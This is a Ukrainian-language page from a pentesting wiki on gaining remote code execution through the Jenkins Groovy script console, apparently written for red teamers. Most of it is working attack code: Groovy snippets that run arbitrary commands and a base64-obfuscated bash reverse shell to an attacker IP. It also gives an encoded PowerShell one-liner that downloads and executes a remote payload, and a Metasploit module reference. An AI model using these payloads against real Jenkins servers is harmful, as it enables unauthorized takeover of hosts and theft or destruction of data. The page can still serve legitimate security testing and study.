Jenkins RCE with Groovy Script

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Використання Jenkins RCE з Groovy Script

Це менш шумний спосіб, ніж створення нового проекту в Jenkins

  1. Перейдіть до шлях_jenkins/script

  2. У полі для тексту введіть скрипт

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Ви можете виконати команду, використовуючи: cmd.exe /c dir

У linux ви можете зробити: "ls /".execute().text

Якщо вам потрібно використовувати лапки та одинарні лапки всередині тексту. Ви можете використовувати """PAYLOAD""" (триподвійні лапки), щоб виконати навантаження.

Ще один корисний груві-скрипт (замініть [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Зворотній shell в Linux

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Зворотній shell в Windows

Ви можете підготувати HTTP-сервер з оберненим shell PS та використовувати Jeking для його завантаження та виконання:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Сценарій

Ви можете автоматизувати цей процес за допомогою цього сценарію.

Ви можете використовувати MSF для отримання зворотного шелу:

msf> use exploit/multi/http/jenkins_script_console
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated